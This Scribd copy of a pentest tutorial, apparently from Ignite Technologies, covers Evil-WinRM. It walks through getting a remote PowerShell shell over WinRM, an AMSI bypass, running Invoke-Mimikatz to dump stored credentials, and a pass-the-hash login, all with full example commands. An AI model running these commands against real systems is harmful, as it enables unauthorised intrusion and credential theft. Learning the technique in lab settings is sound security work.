Scribd
Upload
109 views9 pages

Evil Winrm PDF

Uploaded by

Fredy benites
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
109 views9 pages

Evil Winrm PDF

Uploaded by

Fredy benites
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Contents

Evil-winrm .........................................................................................3
Features ........................................................................................................... 3
Installation ........................................................................................3
Load PowerShell scripts .....................................................................6
Pass the Hash .....................................................................................7
Install using its Docker image .............................................................8

Page 2 of 8
Evil-winrm
This program can be used on any Microsoft Windows Server with this feature enabled (usually at port
5985), of course, only if you have the credentials and permissions to use it. So we can say that it could be
used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice, easy-
to-use features for hacking. It can be used for legitimate purposes by system administrators as well but
most of its features are focused on hacking/pen-testing stuff.

Features

 Compatible to Linux and Windows client systems


 Load in memory Powershell scripts
 Load in memory dll files bypassing some AVs
 Load in memory C# (C Sharp) assemblies bypassing some AVs
 Load x64 payloads generated with awesome donut technique
 AMSI Bypass
 Pass-the-hash support
 Kerberos auth support
 SSL and certificates support
 Upload and download files showing a progress bar
 List remote machine services without privileges
 Command History
 WinRM command completion
 Local files completion
 Colorization on prompt and output messages (can be disabled optionally)
 Docker support (prebuilt images available at Dockerhub)
 Trap capturing to avoid accidental shell exit on Ctrl+C

Installation
In the post, we have discussed two easy methods to install winrm on your Kali Linux. You will find more
methods for installation on GitHub.
With the help of the Ruby gem, you can directly install the evil-winrm. It will automatically install all the
dependencies on your machine by executing the following command.

gem install evil-winrm

once it will get installed you can pull its HELP option by typing 'evil-winrm'
that will display the syntax and other operators for executing evil-winrm against windows remote
management service.

Page 3 of 8
Now using evil-winrm, we try to access a remote machine shell by connecting through port 5985, which
is open for winrm. As a result, it will give access to the victim shell by providing its Powershell as given
below.
Syntax: evil-winrm -i <Windows IP> -u <username> -p <'password'>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

Page 4 of 8
It will not only provide a shell of the host machine but also provide a menu to load functions such as
Invoke-Binary, Dll-Loader, Donut-Loader, and Bypass-4MSI.

Page 5 of 8
Load PowerShell scripts
So, we have some pen testing powershell script in the /root/powershell and we can upload this ps1 script
through evil winrm on the host machine.

The .PS1 scripts must be in the path set at -s argument and execute this as given below:
Syntax: evil-winrm -i <Windows IP> -u <username> -p <'password'> -s <path>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell/

Type menu again and see the loaded functions and use Bypass 4MSI then Invoke the script. Here we have
tried to upload the mimikatz PowerShell script to dump stored credentials.

menu
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
sekurlsa::logonpasswords

As a result, it has dumped all the credentials of the Windows Server.

Page 6 of 8
Pass the Hash
It has one more feature which allows you to conduct Pass the HASH attack and as a result, it gives the
shell of the host machine.

evil-winrm -i 192.168.1.105 -u administrator -H 32196B56FFE6F4E294117B91A83BF38

Page 7 of 8
Install using its Docker image
This is a very easy and convenient method to install winrm on your attacking machine and simultaneously
provide the shell of the victim machine by compromising its winrm service. Only you need to execute the
following command.

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator


-p 'Ignite@987'

Page 8 of 8
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security


Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer


Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in

You might also like